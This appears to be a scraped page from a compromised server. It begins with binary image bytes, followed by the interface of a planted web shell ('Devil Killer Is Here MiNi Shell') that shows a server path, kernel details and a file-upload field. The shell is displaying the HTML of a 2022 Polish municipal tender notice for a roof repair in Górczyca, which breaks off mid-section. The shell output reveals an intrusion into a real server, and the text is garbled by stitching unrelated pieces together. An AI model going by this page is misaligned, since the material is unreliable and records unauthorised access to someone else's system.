JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220531/0018679701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu budynku w miejscowości Górczyca nr 28 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina i Miasto Lwówek Śląski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000530643</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Wojska Polskiego 25A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lwówek Śląski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756477888</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lwowekslaski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lwowekslaski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu budynku w miejscowości Górczyca nr 28 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-18072bb0-e0b8-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00186797</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039112/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Remont dachu budynku w miejscowości Górczyca 28</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/lwowekslaski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/lwowekslaski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl dalej: „Platforma”, pod adresem: https://platformazakupowa.pl/pn/lwowekslaski.<br/>2. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanych w SWZ.<br/>3. Funkcjonalność Platformy gwarantuje złożenie przez Wykonawcę w postępowaniu zaszyfrowanej<br/>oferty wraz z załącznikami, w sposób uniemożliwiający Zamawiającemu zapoznanie się z treścią oferty<br/>przed upływem terminu składania ofert.<br/>4. W toku prowadzonego postępowania komunikacja między Wykonawcami a Zamawiającym<br/>prowadzona będzie za pośrednictwem Platformy. Wszelkie oświadczenia, wnioski, zawiadomienia oraz<br/>informacje, przekazywane będą za pośrednictwem formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę<br/>ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do<br/>zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje w postaci elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie w sekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana w postaci elektronicznej za pośrednictwem platformy do<br/>konkretnego Wykonawcy.<br/>6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>przesłanych przez Zamawiającego bezpośrednio na Platformie, gdyż system powiadomień może ulec<br/>awarii lub powiadomienie może trafić do folderu SPAM. 7. Zamawiający, zgodnie z Rozporządzeniem<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r.,<br/>poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie,<br/>tj.:<br/>7.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>7.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV<br/>2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4,<br/>Linux, lub ich nowsze wersje,<br/>7.3. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie<br/>wersja 10 0.,<br/>7.4. włączona obsługa JavaScript,<br/>7.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>7.6. platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8,<br/>7.7. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>8. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania<br/>Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>9. Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików<br/>muszą spełniać wymogi określone w Rozporządzeniu Parlamentu Europejskiego i Rady w sprawie<br/>identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku<br/>wewnętrznym (eIDAS) (UE) nr 910/2014.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. TOŻSAMOŚĆ ADMINISTRATORA: Administratorem<br/>Państwa danych osobowych jest: Burmistrz Gminy i Miasta Lwówek Śląski, z siedzibą w Lwówku<br/>Śląskim (59-600) przy al. Wojska Polskiego 25 A;<br/>2. DANE KONTAKTOWE ADMINISTRATORA: Z administratorem – Burmistrzem Gminy i Miasta<br/>Lwówek Śląski można się skontaktować pisemnie na adres siedziby administratora oraz poprzez adres<br/>e-mail sekretariat@lwowekslaski.pl, tel. 75 6477888.<br/>3. DANE KONTAKTOWE INSPEKTORA OCHRONY DANYCH: Administrator : Burmistrz Gminy i<br/>Miasta Lwówek Śląski wyznaczył inspektora ochrony danych, z którym może się Pani / Pan<br/>skontaktować poprzez e-mail iod@lwowekslaski.pl lub pisemnie na adres siedziby administratora. Z<br/>inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących<br/>przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych.<br/>4. CELE PRZETWARZANIA I PODSTAWA PRAWNA: Pani / Pana dane będą przetwarzane w celu: -<br/>przeprowadzenia postępowania o udzielenie zamówienia w trybie ustawy Pzp; - w przypadku<br/>wyłonienia wykonawcy - w celu realizacji przedmiotu zamówienia. Pani/Pana dane będą przetwarzane<br/>na podstawie przepisów: - Ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych; -<br/>Zarządzenie Nr IN.0050.22.2022 Burmistrza Gminy i Miasta Lwówek Śląski z dnia 01 lutego 2022 r.<br/>w sprawie zatwierdzenia Regulaminu udzielania zamówień publicznych o wartości do 130 000 zł.<br/>5. ODBIORCY DANYCH: Pani/Pana dane osobowe przekazywane będą: - podmiotom upoważnionym<br/>na podstawie przepisów prawa; - osobom lub podmiotom, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 i 19 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>- usługodawcom wykonującym zadania na zlecenie Administratora w ramach świadczonych usług<br/>serwisu i utrzymania systemów i programów informatycznych, z którymi administrator ma podpisane<br/>stosowne umowy powierzenia danych.<br/>6. PRZEKAZANIE DANYCH OSOBOWYCH DO PAŃSTWA TRZECIEGO LUB ORGANIZACJI<br/>MIĘDZYNARODOWEJ: Pani/Pana dane osobowe nie będą przekazywane poza Europejski Obszar<br/>Gospodarczy. Z uwagi na charakter świadczonych usług przez podmiot przetwarzający, dane osobowe<br/>będą przechowywane w chmurze obliczeniowej, a wszystkie serwery zlokalizowane będą na terenie Unii Europejskiej.<br/>7. OKRES PRZECHOWYWANIA DANYCH: Pani/Pana dane osobowe ujęte w protokole postępowania<br/>wraz z załącznikami będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres nie krótszy niż 4<br/>lata od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Państwa dane<br/>zarejestrowane na platformie zakupowej będą przechowywane a następnie zarchiwizowane przez<br/>okres max 10 lat od dnia upływu terminu składania ofert. CIĄG DALSZY W &#34;Informacje dodatkowe&#34;.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Skorzystanie przez osobę, której dane osobowe dotyczą,<br/>z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IN.271.39.2022.AK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont dachu budynku w miejscowości Górczyca nr 28.<br/>STAN ISTNIEJĄCY :<br/>Budynek konstrukcji murowanej tradycyjnie, dach konstrukcji krokwiowo-jętkowej, pokrycie<br/>istniejące dachówka karpiówka, ułożona w koronkę. Kominy murowane z cegły pełnej, obróbki z<br/>blachy ocynkowanej, rury spustowe i rynny z PCV.<br/>ZAKRES PRAC DO WYKONANIA:<br/>- prace przygotowawcze i ustawienie rusztowań,<br/>- rozbiórka istniejącego pokrycia wraz z łaceniem i obróbkami blacharskimi,<br/>- przemurowanie częściowe kominów nad dachem i w części pod dachem,<br/>- wzmocnienie elementów konstrukcji dachu,<br/>- membrana wstępnego krycia ( FWK) rozstaw kontrłat 80 - 90 cm,<br/>- wzmocnienie łacenia dachu pod pokrycie z dachówki o rozstępie łat 30 cm, łaty 4 x 6 cm,<br/>- krycie dachu dachówka ceramiczną karpiówką w koronkę, z pokryciem naroży i klenic oraz<br/>uszczelnieniem pokrycia dachówki z murami,<br/>- wymiana rynien.<br/>Drewno do remontu konstrukcji dachowej powinno być odpowiednio przygotowane - wysuszone<br/>oraz zabezpieczone przed działaniem czynników biologicznych, ognia i wilgoci. Drewno<br/>przeznaczone do impregnacji powinno być odpowiednio wysuszone ( o wilgotności poniżej 20%)<br/>oraz oczyszczone z kory i zbrudzeń, które uniemożliwiałyby wnikanie impregnatu. Na<br/>wzmocnienie elementów konstrukcyjnych więźby dachowej zastosować należy drewno suszone<br/>przemysłowo w specjalnych suszarniach. Łaty wymagają pełnej impregnacji, muszą posiadać <br/>trzy ostre krawędzie (dopuszczone są oflisy zwrócone w stronę okapu). Nie dopuszcza się<br/>obecności kory. Należy zwrócić uwagę, aby kontrłaty miały wysokość min. 25 mm, a wysokość<br/>podwójnej konstrukcji składającej się z łat i konrłat była nie mniejsza niż 55 mm, aby zapewnić<br/>właściwą wentylację. Dachówka ceramiczna, karpiówka wymiary 18 x 38 x 1,4 cm, ułożona w<br/>koronkę, kolor naturalny -ceglana angoba, w potrójny prążek.<br/>Układanie dachówki w koronkę:<br/>- rozstaw łat 30 cm, a na jednej łacie umieszcza się dwie warstwy dachówek,<br/>- ich zakład (nachodzenie na siebie )będzie wynosić 3-4 cm,<br/>- przy tej metodzie mocuje się jedynie dachówki z warstwy spodniej, a dachówki z warstwy<br/>górnej przywiesza się do nich na zaczepach,<br/>- każdy rząd powinien być przesunięty względem wyższego o połowę szerokości dachówki,<br/>kolejne rzędy maja na siebie zachodzić na długość ok. 1/3 dachówki,<br/>- kominki odpowietrzające - służą wyłącznie do odpowietrzania instalacji sanitarnych budynku.<br/>Pod żadnym pozorem nie wolno ich stosować w pionach odprowadzających jakiekolwiek<br/>spaliny. Przy montażu kominków należy zwrócić uwagę na połączenie pionu sanitarnego z<br/>kominkiem odpowietrzającym za pomocą rury spiro, która należy dokładnie obłożyć izolacja<br/>termiczna ( np. wełną mineralną), aby w okresie dużych różnic temperaturowych nie wykraplała<br/>się na nich woda. PRZEWIDYWANY OBMIAR PRAC:<br/>o Roboty przygotowawcze i rozbiórkowe - ok. 338 m2;<br/>o Rozbiórka pokrycia z dachówek: karpiówek układanych podwójnie (plus lukarny typu wole oko<br/>z obu stron) – ok. 338 m2;<br/>o Rozebranie ołacenia dachu: z łat w odstępach ponad 24 cm - ok. 338 m2;<br/>o Przemurowanie kominów z cegły budowlanej pełnej klinkierowej na zaprawie<br/>cementowowapiennej,<br/>o objętości w jednym miejscu: ponad 0,5 m3-ok. 3,00 m3;<br/>o Wzmocnienie elementów drewnianej konstrukcji dachu: murłat i podwalin (murłata wym.: 14 x<br/>18 cm , kalenica 14 x 16 cm ) – ok. 72 m;<br/>o Wzmocnienie elementów drewnianej konstrukcji dachu: słupów (słupy wym.: 14 x 14 cm)- ok.<br/>28m;<br/>o Wzmocnienie drewnianych belek stropowych – ok. 92 m;<br/>o Wzmocnienie elementów drewnianej konstrukcji dachu: końców krokwi (przepustnice wym.: 14<br/>x 12 cm i końcówki krokwi) – ok. 12 szt.<br/>o Wzmocnienie elementów drewnianej konstrukcji dachu: krokwi zwykłych i kleszczy (krokwie<br/>wym. : 14 x 12 cm) – ok. 75 m;<br/>o Impregnacja, przycięcie i przybicie kontrłat i łat (łaty 4 x 6 cm , kontrłaty 2,80 x 4,8 cm) - ok.<br/>338 m2;<br/>o Ułożenie na krokwiach ekranu zabezpieczającego z folii (membrana dachowa (FWK ) z<br/>tworzywa sztucznego) - ok. 338 m2;<br/>o Obróbki z blachy ocynkowanej, w kolorze dachówki, grub. 0,55 mm, o szerokości w<br/>rozwinięciu (kominy, pas nadrynnowy): do 25 cm – ok. 13 m2;<br/>o Obróbki z blachy ocynkowanej, w kolorze dachówki, grub. 0,55 mm, o szerokości w<br/>rozwinięciu: ponad 25 cm (wiatrownice) – ok. 13 m2;<br/>o Obrobienie krawędzi balkonów i loggii z blachy ocynkowanej, w kolorze dachówki, grub. 0,55<br/>mm - lukarny typu wole oko – ok. 10 m2;<br/>o Krycie dachu dachówką ceramiczną na zaprawie wapiennej z pokryciem naroży i kalenic oraz<br/>uszczelnieniem pokrycia z murami: -dachówką karpiówką w koronkę - ok. 338 m2;<br/>o Dodatek do uzupełnień pokryć dachowych z dachówek przy oknach owalnych (wole oka), przy<br/>szerokości okna: ponad 1 do 3 m - krycie podwójne – 2szt.;<br/>o Kominki wentylacyjne ceramiczne – 3 szt.;<br/>o Rynny dachowe półokrągłe z blachy ocynkowanej powlekanej, o średnicy: ok. 150 mm – ok.<br/>39m;<br/>o Leje spustowe przy rynnach dachowych i rurach spustowych – 8 szt.;<br/>o Rury spustowe okrągłe z blachy ocynkowanej powlekanej, o średnicy: ok. 120 mm – ok. 22m;<br/>o Rusztowania zewnętrzne rurowe o wysokości: do 10 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi<br/>kryteriami:<br/>cena oferty (brutto) - znaczenie 60%<br/>okres gwarancji na wykonane roboty budowlane - znaczenie 40%<br/>Ocena ofert będzie się odbywała wg następujących zasad:<br/>W kryterium „cena” (Kc) Zamawiający dokona oceny punktowej każdej z ofert zgodnie z formułą:<br/>Kc= (cena najniższa)/(cena oferty badanej) ×100 pkt ×60%<br/>W kryterium „Okres gwarancji na wykonane roboty budowlane” (Kg) oferta może uzyskać maksymalnie<br/>40 punktów. Ocena zostanie dokonana na podstawie okresu gwarancji wskazanego przez Wykonawcę<br/>w Ofercie. Minimalny wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. Każde<br/>dodatkowe 6 miesięcy gwarancji powyżej wymaganego 36 miesięcznego okresu będzie premiowane<br/>przez Zamawiającego. Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco:<br/>36 miesięcy (wymagane) – 0 punktów<br/>42 miesiące – 10 punktów<br/>48 miesięcy – 20 punktów<br/>54 miesiące – 30 punktów<br/>60 miesięcy – 40 punktów<br/>W przypadku niepodania przez Wykonawcę okresu gwarancji skutkować będzie odrzuceniem oferty na<br/>podstawie art. 226 ust. 1 pkt 5 Ustawy. Ocena punktowa będzie wyrażona liczbą zaokrągloną do dwóch<br/>miejsc po przecinku. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą ilość<br/>punktów w wyniku następującego działania:<br/>K = Kc + Kg<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w Ustawie oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru. Jeżeli nie można będzie dokonać wyboru oferty najkorzystniejszej<br/>ze względu na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i innych kryteriów<br/>oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone<br/>oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia w<br/>określonym terminie ofert dodatkowych. Zamawiający wybiera ofertę najkorzystniejszą w terminie<br/>związania ofertą określonym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający 